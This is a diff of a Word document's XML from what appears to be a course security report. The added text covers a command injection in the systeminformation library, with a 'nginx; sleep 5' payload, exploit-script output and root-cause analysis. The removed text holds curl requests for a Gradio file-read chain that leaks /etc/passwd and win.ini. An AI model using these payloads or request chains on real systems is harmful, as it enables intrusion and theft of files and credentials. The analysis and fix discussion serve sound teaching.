+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>10.3 Why a time-based check</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The library captures the command output and parses it into objects, so the attacker does not see stdout directly. Three options exist for the proof: read a side effect (write a file), exfiltrate through a second host, or measure time. The time-based check is the least invasive and the most portable, which is why exploit/si_exploit.py uses it: the baseline request takes milliseconds, the payload request takes the length of the injected sleep.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="170"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>$ python exploit/si_exploit.py --target http://127.0.0.1:3000</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>=== 1. version in use ===</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>&lt; HTTP 200 in 0.01s</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>&lt; {"ok":true,"version":"5.3.0"}</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>=== 2. control request: a plain name ===</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>&lt; HTTP 200 in 0.02s</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>=== 3. the payload: name='nginx; sleep 5' ===</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>&lt; HTTP 200 in 5.04s</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>=== 4. verdict ===</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>difference : 5.02s (threshold 4s)</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>injected   : YES — the parameter reached a shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="595F66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Transcript to be produced by running the script against the vulnerable container.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5761,12 +6013,12 @@
           <w:color w:val="8A5A00"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>[ SCREENSHOT PLACEHOLDER ]  Docker Desktop / terminal showing the container running and the gradio interface open at http://127.0.0.1:7860.</w:t>
+        <w:t>[ SCREENSHOT PLACEHOLDER ]  Terminal capture of the exploit script against the vulnerable container (5.04s response).</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>For a fully offline reproduction the same application can be started without Docker: pip install gradio==4.12.0, then python app/app.py. The behaviour is identical; the container is only used because it matches the course instructions and isolates the vulnerable version.</w:t>
+        <w:t>What an attacker does with this is the usual post-exploitation of a command injection: read .env and cloud credentials, pivot to the internal network, or install persistence. The dashboard runs as an unprivileged user inside the container (see Dockerfile), which limits the damage to the files that user can reach — but not the fact of execution.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5774,12 +6026,12 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>10. Reproducing the attack</w:t>
+        <w:t>11. Root-cause analysis</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The attack is a three-step chain. Every step is an ordinary HTTP request that requires no credentials. The script exploit/gradio_exploit.py performs exactly these three steps and prints each exchange.</w:t>
+        <w:t>The defect is not a missing quote; it is a wrong parameter contract combined with a shell that is built by concatenation. Two independent mistakes make it exploitable, and the upstream fix addresses both.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5787,7 +6039,12 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>10.1 Step 1 — obtain a component id from /config</w:t>
+        <w:t>11.1 Defect 1 — the parameter is interpolated into a shell command</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>systeminformation answers questions about the host by running tools such as ps, netstat, ifconfig, sc and docker. Those calls are made with child_process.exec(), which always starts a shell. The library then assembles the command line with the caller's value inside it:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5808,7 +6065,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>$ curl -s http://127.0.0.1:7860/config | python -m json.tool | head -30</w:t>
+        <w:t># lib/processes.js</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5817,7 +6074,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>{</w:t>
+        <w:t>exec(comm + ' | grep -v grep | grep -iE "' + srvString + '"', cb)</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5826,7 +6083,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">  "version": "4.12.0",</w:t>
+        <w:t>exec('ps -o comm | grep -v grep | egrep "' + srvString + '"', cb)</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5835,7 +6092,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">  "components": [</w:t>
+        <w:t xml:space="preserve"> </w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5844,7 +6101,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">    {"id": 1, "type": "markdown", ...},</w:t>
+        <w:t># lib/network.js</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5853,7 +6110,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">    {"id": 2, "type": "textbox", ...},</w:t>
+        <w:t>cmd = 'netstat -bdI ' + ifaceSanitized;</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5862,25 +6119,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">    {"id": 3, "type": "textbox", ...}</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  ], ...</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>}</w:t>
+        <w:t>exec(cmd, cb)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5893,7 +6132,12 @@
           <w:color w:val="595F66"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>/config is a normal, unauthenticated Gradio endpoint; it discloses the numeric id of every component.</w:t>
+        <w:t>Three examples from the vulnerable release; the same pattern appears in the docker helpers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Because the value is inside the command line, it is parsed by the shell as syntax: the semicolon ends the intended command and starts a new one. Nothing in the library distinguishes “the name of a service” from “a fragment of shell”.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5901,7 +6145,25 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>10.2 Step 2 — invoke move_resource_to_block_cache</w:t>
+        <w:t>11.2 Defect 2 — the parameter type is string or array</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The functions accept string | string[], which is convenient for the caller and fatal for the sink: JavaScript coerces an array to a comma-joined string, so a caller that passes an array can still deliver metacharacters. The advisory's workaround (“do only allow strings, reject any arrays”) is a direct reference to this. Section 13 shows the measurable difference between the two releases on exactly this point.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>11.3 Why a blacklist sanitiser is the weaker half of the fix</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The library already shipped util.sanitizeShellString() in 5.3.0. It keeps a string only if every character is outside a list of “dangerous” ones:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5922,7 +6184,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>$ curl -s -X POST http://127.0.0.1:7860/component_server \</w:t>
+        <w:t>// lib/util.js — unchanged between 5.3.0 and 5.3.1</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5931,7 +6193,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">       -H 'Content-Type: application/json' \</w:t>
+        <w:t>const blocked = ['&gt;','&lt;','*','?','[',']','|','˚','$',';','&amp;','(',')','#','\\','\t','\n',</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5940,7 +6202,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">       -d '{"component_id":"3",</w:t>
+        <w:t xml:space="preserve">                 "'",'`','"'];</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5949,7 +6211,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">            "data":"/etc/passwd",</w:t>
+        <w:t>// strict mode additionally removes ' ', '{', ')'</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5958,7 +6220,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">            "fn_name":"move_resource_to_block_cache",</w:t>
+        <w:t xml:space="preserve"> </w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5967,7 +6229,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">            "session_hash":"aaaaaaaaaaa"}'</w:t>
+        <w:t>sanitizeShellString('nginx; id | whoami &amp;&amp; curl http://x/$(echo y)`id`')</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5976,20 +6238,12 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>"/tmp/gradio/916eb712d668cf14a35adf8179617549780c4070/passwd"</w:t>
+        <w:t xml:space="preserve">  -&gt; "nginx id  whoami  curl http://x/echo yid" </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="200"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="595F66"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>The endpoint answers 200 and returns the path of the copy it has just made.</w:t>
+      <w:r>
+        <w:t>The filter works for the characters it knows, and that is exactly the problem with a blacklist: it is only as good as the list. In 5.3.0 several call sites did not call it at all (docker, network, processLoad), which is what the patch changed. The mechanism is therefore better described as “the value is filtered before it reaches the shell” than as “the value is safe”: the sink is still a shell.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5997,752 +6251,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>10.3 Step 3 — download the copy through /file</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="170"/>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-          <w:left w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-          <w:right w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-        </w:pBdr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>$ curl -s "http://127.0.0.1:7860/file=/tmp/gradio/916eb712d668cf14a35adf8179617549780c4070/passwd"</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>daemon:x:1:1:daemon:/usr/sbin:/usr/bin:/sbin:/bin</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="200"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="595F66"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>A file that the attacker was never supposed to read.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>10.4 Observed result</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="170"/>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-          <w:left w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-          <w:right w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-        </w:pBdr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>$ python exploit/gradio_exploit.py --target http://127.0.0.1:7860 --file C:\Windows\win.ini</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&gt; GET http://127.0.0.1:7860/config</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; HTTP 200 OK</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; Content-Type: application/json</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; Content-Length: 2472</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[i] components exposed by /config: [1, 2, 3, 4]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&gt; POST http://127.0.0.1:7860/component_server</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; HTTP 200 OK</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; Content-Type: application/json</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; Content-Length: 111</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; body: "C:\\Users\\13633\\AppData\\Local\\Temp\\dsh-SkzHlF\\gradio\\973672eeae5a05447e47395cde37e8121b7c90fe\\win.ini"</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[i] component 1 copied the file to: C:\Users\13633\AppData\Local\Temp\dsh-SkzHlF\gradio\973672eeae5a05447e47395cde37e8121b7c90fe\win.ini</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&gt; GET http://127.0.0.1:7860/file=C:\Users\13633\AppData\Local\Temp\dsh-SkzHlF\gradio\973672eeae5a05447e47395cde37e8121b7c90fe\win.ini</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; HTTP 200 OK</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; Content-Type: text/plain; charset=utf-8</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; Content-Length: 92</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; body (first 500 bytes):</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>; for 16-bit app support</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[fonts]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[extensions]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[mci extensions]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[files]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[Mail]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>MAPI=1</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>=== RESULT: file contents leaked to an unauthenticated attacker ===</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>; for 16-bit app support</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
